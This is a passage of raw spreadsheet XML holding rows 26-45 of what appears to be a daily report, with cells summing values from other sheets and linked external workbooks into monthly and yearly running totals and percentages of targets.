        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'29'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]30'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]30'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]30'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]30'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]30'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]30'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]30'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]30'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]30'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'29'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'29'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]30'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]30'!$X$69</f>
        <v>22.5925764408544</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]30'!$Y$69</f>
        <v>25.1966540548776</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]30'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]30'!$U$69</f>
        <v>53.0069444444444</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]30'!$V$69</f>
        <v>67.1077152014652</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]30'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]30'!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]30'!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'29'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'29'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]30'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]30'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]30'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]30'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]30'!$U$104</f>
        <v>32.07875</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]30'!$V$104</f>
        <v>61.7103594322344</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]30'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]30'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]30'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'29'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'29'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]30'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]30'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]30'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]30'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]30'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]30'!$V$105</f>
        <v>32.0991529304029</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]30'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]30'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]30'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'29'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'29'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]30'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]30'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]30'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]30'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]30'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]30'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]30'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]30'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]30'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]30'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]30'!$E$16</f>
        <v>2770</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'29'!H31</f>
        <v>134322</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1507329</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]30'!$I$16</f>
        <v>4367.28</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'29'!K31</f>
        <v>148512.17</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1504560.3</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]30'!$L$16</f>
        <v>51239.2</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>68.3189333333333</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'[11]30'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]30'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'29'!H32</f>
        <v>103074</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1630917</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]30'!$I$13</f>
        <v>2032</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'29'!K32</f>
        <v>99121</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1120599</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]30'!$L$13</f>
        <v>38802.806</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>77.605612</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]30'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]30'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]30'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]30'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]30'!$U$76</f>
        <v>4.02777777777778e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]30'!$V$76</f>
        <v>4.10943223443224e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]30'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]30'!$R$76</f>
        <v>2.9e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]30'!$S$76</f>
        <v>3.59e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]30'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'29'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]30'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'29'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]30'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]30'!$W$77</f>
        <v>21.91</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]30'!$X$77</f>
        <v>21.01</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]30'!$Y$77</f>
        <v>19.82</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]30'!$T$77</f>
        <v>100.000000000042</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]30'!$U$77</f>
        <v>31.1430555555569</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]30'!$V$77</f>
        <v>60.4859203296717</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]30'!$Q$77</f>
        <v>24.00000000001</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]30'!$R$77</f>
        <v>224.23000000001</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]30'!$S$77</f>
        <v>5284.05000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]30'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'29'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]30'!$I$50</f>
        <v>710.420000000002</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'29'!K34</f>
        <v>25587.7</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>492790.63</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]30'!$L$15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'[11]30'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'29'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]30'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'29'!K35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G36+'29'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'29'!K36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G37+'29'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'29'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]30'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]30'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]30'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'29'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]30'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'29'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]30'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'29'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'29'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]30'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]30'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]30'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'29'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]30'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'29'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]30'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'29'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'29'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]30'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]30'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]30'!$R$50</f>
        <v>721.4</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'29'!U39</f>
        <v>9948.46</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>88762.059</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]30'!$V$50</f>
        <v>235</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'29'!X39</f>
        <v>9202</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>87961</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]30'!$Y$50</f>
        <v>1978.006</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'29'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'29'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]30'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]30'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]30'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]30'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]30'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]30'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]30'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]30'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]30'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]30'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]30'!$E$16</f>
        <v>2177</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'29'!H41</f>
        <v>22214</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>147190</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]30'!$I$16</f>
        <v>764.57</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'29'!K41</f>
        <v>26213.38</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>147606.92</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]30'!$L$16</f>
        <v>22130.38</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>73.7679333333333</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]30'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]30'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]30'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'29'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]30'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'29'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]30'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]30'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]30'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'29'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]30'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'29'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]30'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]30'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]30'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]30'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'29'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]30'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'29'!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]30'!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]30'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]30'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'29'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]30'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'29'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]30'!$L$14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'[12]30'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'29'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]30'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'29'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]30'!$L$15</f>
        <v>50436.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]30'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]30'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]30'!$R$29</f>
        <v>223.719999999999</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'29'!U44</f>
        <v>7413.82</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>72166.988</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]30'!$V$29</f>
        <v>118</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'29'!X44</f>
        <v>5402</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>71812</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]30'!$Y$29</f>
        <v>4311.277</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]30'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'29'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]30'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'29'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]30'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]30'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]30'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]30'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]30'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
